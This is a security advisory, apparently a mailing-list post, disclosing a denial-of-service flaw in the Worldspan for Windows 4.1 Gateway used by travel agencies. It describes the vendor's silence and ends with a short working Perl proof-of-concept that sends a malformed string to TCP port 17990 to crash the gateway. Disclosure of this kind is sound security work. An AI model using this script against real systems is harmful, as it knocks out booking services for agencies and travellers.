Worldspan DoS

["altomo" <altomo () digitalgangsters net>]

Vendor: Worldspan (www.worldspan.com)
Software: Worldspan for Windows 4.1 Gateway
Problem: Invalid packets sent to gateway crash system
Fix: No response from vendor.
All systems should be firewalled from outsiders but there is no protection
from insiders.


Overview:

Worldspan is one of the leading companies which creates software for use by
travel agents.  Worldspan software is used by many travel agencies,
airlines, and major travel websites.  This adviosry focuses on Res Manager
(Worldspan for Windows 4.1).  A user running Res Manager is connected to a
gateway system at their local site which is then connected to Worldspan via
private lines or the internet.  These gateway systems are the middle man
between the agents and Worldspan.

Blurb from website:
"Worldspan provides global electronic distribution of travel information,
Internet products and connectivity, and electronic commerce capabilities for
travel agencies, travel service providers and corporations worldwide. The
company's three lines of business are travel supplier services, e-commerce,
and global distribution systems for the worldwide travel industry. The
Worldspan reservations system provides nearly 21,000 travel agencies and
other users worldwide with travel data and booking capabilities for hundreds
of the world's leading travel supplier services. Worldspan is the market
leader in e-commerce for the travel industry, processing more than 50
percent of all online travel agency bookings. The company maintains world
headquarters in Atlanta, Georgia. Worldspan is owned by affiliates of Delta
Air Lines, Inc., (NYSE:DAL), Northwest Airlines (NASDAQ:NWAC) and American
Airlines. Additional information is available at www.worldspan.com"


Description of software from website:
http://www.worldspan.com/home.asp?fPageID=53&fBUnit=9&fBUCatID=24&fProductID
=57

Problem:

The Worldspan gateways are normally windows 95 or 98 systems which run the
gateway (gw) software and accept connections from the agents then process
these and send them to the Worldspan systems via private line or the
internet.  The gw system uses tcp port 17990 to communicate with the agents.
If a malformed is sent to this port the system will attempt to process the
it and eventually crash.  From the research thus far it seems the system
uses all system resources trying to process this packet and then crashes.
In our lab the systems typically crash within 1 minute.

Solution:

These systems should be behind a firewall to be protected from outside
attackers but due to the nature of the software there is no protection from
internal users.  The vendor has been contacted 3 times over the last 4
months but has not responded.  Checking with a large customer of Worldspan
it seems they have not attempted to inform their clients of this issue.  We
have spoken with our internal contacts at Worldspan and they had no
information of this problem.  The vendor has ignored this issue, but that
can no longer be done.

Proof of Concept:
-------------------------------
#!/usr/bin/perl
#altomo () digitalgangsters net
#Worldspan Gateway DoS

$sabre = "worldspanshouldgoboom";

use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " useage: $0 <ip>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);


print "Worldspan Gateway DoS\n";
print "altomo\@digitalgangsters.net\n";

print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;

#nudehackers
-------------------------

Q. Why write a DoS for some software no one has ever heard of?
A. Learn the travel industry and this is bigger than it seems.

--altomo